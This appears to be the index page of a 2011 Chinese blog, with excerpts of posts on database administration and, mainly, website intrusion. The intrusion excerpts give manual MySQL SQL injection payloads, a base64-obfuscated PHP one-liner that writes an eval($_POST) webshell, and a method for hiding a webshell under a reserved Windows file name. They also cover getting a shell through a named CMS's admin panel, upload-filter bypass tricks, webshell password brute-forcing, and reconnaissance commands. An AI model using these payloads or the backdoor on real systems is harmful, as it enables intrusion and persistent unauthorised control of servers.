PHP+MySQL 手工注入语句

分类:安全 | 2011-09-30 | 撸过 537 次
0人扯谈

暴字段长度
order by num/*

匹配字段
and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息
version() database() user()

不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*

操作系统信息:
and[......]

继续阅读

MySQL定时备份Windows主机

分类:技术 | 2011-09-30 | 撸过 370 次
0人扯谈

对于Windows主机

  ==============

  假想环境:

  MySQL 安装位置:C:\MySQL

  论坛数据库名称为:bbs

  MySQL root 密码:123456

  数据库备份目的地:D:\db_backup\

  程序代码

  @echo off

  C:\MySQL\bin\mysqladmin -u root --password=123456 shutdown

  C:\MySQL\bin\mysqldump --opt -u root --password=123456 bbs > D:\db_backup\bbs.sql

  C:[......]

继续阅读

新方法打造永不被删除的webshell

分类:安全 | 2011-09-30 | 撸过 431 次
1人扯谈

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:

D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp

已复制 1 个文件。

D:\AspWebServer\wwwroot>dir

驱动器 D 中的卷没有标签。

卷的序列号是 47747.net6-1D29

D:\AspWebServer\wwwroot 的目录

2010-04-25 14:41 .
2010-04-25 14:41[......]

继续阅读

MSSQL数据库日志满后快速解决办法

分类:技术 | 2011-09-30 | 撸过 295 次
0人扯谈

先提供一种复杂的方法压缩日志及数据库文件如下:

1.清空日志
DUMP TRANSACTION 库名 WITH NO_LOG
2.截断事务日志:
BACKUP LOG 数据库名 WITH NO_LOG
3.收缩数据库文件(如果不压缩,数据库的文件不会减小
企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件
--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了
--选择数据文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了
也可以用SQL语句来完成
--收缩数[......]

继续阅读

架设基于windows2003的安全Asp.net服务器

分类:技术 | 2011-09-30 | 撸过 399 次
1人扯谈

随着Microsoft Visual Studio 开发环境的普及,基于Asp .Net坏境的网站越来越多。因此Asp .net服务器的安全问题自然而然的成为了人们关心的问题。本文以Windows2003为例,架设一台安全的Asp .Net的服务器。

实验坏境:
操作系统:Microsoft Windows Server 2003 Enterprise Edition Service Pack 2
iis版本:6.0
架设Asp .Net的基本平台:
1. 安装Windows Server 2003:
 Windows Server 2003的具体安装方法这么不再讲述,但需要注意三点:
  [......]

继续阅读

mysql官方网站被黑并获得了ROOT权限

分类:新闻 | 2011-09-29 | 撸过 451 次
0人扯谈

太牛X了,mysql都被强奸了,世界又开始混乱......

Amorize的安全研究人员最近表示,已经确认黑客入侵mysql.com,并通过iframe的方法

让用户感染了恶意代码,他们已经追踪到佛罗里达和瑞典两个恶意软件托管地,在当地时

间周一下午依然在对mysql.com的访客实施攻击,用户凭据可能已经遭到了窃取,因此

建议mysql.com注册过的用户修改自己与此相同的密码。

更糟的是研究发现,mysql.com的root权限似乎已经开始在俄罗斯的地下黑客论坛挂牌出售,

价格3000美元,黑客们只要给钱就可以获得访问mysql.com的权限,可见问题的糟糕程度。

114啦网址导航v1.15后台拿shell

分类:安全 | 2011-09-29 | 撸过 361 次
0人扯谈

我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。

后台 点击模块管理--->分类模块-->添加模块

直接添加后缀为php或asp的 都可以

内容就是马的内容。

马地址 在admin\tpls\tpls\main\green\class目录下

PHP一句话变型

分类:安全 | 2011-09-29 | 撸过 482 次
0人扯谈

<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?>

<script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));</script>

//file:lost.php

//p[......]

继续阅读

(转载)万能破解webshell密码

分类:安全 | 2011-09-29 | 撸过 2,004 次
1人扯谈

前一阵发表的自动循环机破解无返回错误的一句话,大家可能有很多疑虑,这次给大家显示一个彻底通杀的办法。
先来看看一款PHP shell,如图:

这款shell输入错误密码没有返回错误信息,在登录页面里找关键字也不可以爆破,难道真的没办法啦~下面就来演示下

先用抓包工具抓一下包,可以看到是post提交方式

把抓到的包填写到自动循环机里,并执行一下看下返回信息是不是200

设置上字典文件,这里我们把post里红色字体内容更换为调用字典的参数adminpass=123&do=login ,然后给字典一选择一份字典

最后我们设置错误关键字

先给出一份返回包的数据[......]

继续阅读

渗透思路+技巧

分类:安全 | 2011-09-29 | 撸过 434 次
0人扯谈

上传漏洞拿shell:

1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.

2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。

3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。

4.gif文件头欺骗

5.同名重复上传也很OK。:

 

渗透过程中常用命令

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息

tasklist /svc 查看 服务对应的pid

netstat -ano,ne[......]

继续阅读

第 1 页,共 10 页12345...10...最旧 »